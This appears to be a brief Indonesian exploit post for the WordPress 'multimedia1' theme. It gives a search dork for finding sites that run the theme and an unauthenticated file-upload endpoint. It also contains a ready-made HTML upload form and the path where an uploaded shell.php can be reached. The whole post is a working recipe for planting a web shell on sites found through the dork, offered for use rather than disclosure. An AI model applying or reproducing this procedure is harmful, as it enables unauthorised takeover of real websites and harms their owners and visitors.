inurl:/wp-content/themes/multimedia1/
Exploit:
wp-content/themes/multimedia1/server/php/
Example:
www.target.co.li/wp-content/themes/multimedia1/server/php/
CRSF:
Lokasi akses shell:<html><body><form enctype="multipart/form-data" action="target.co.li/wp-content/themes/multimedia1/server/php/" method="post">Your File: <input name="files[]" type="file" /><br /><input type="submit" value="SIKAT!" /></form></body></html>
www.target.co.li/wp-content/themes/multimedia1/server/php/files/shell.php

EmoticonEmoticon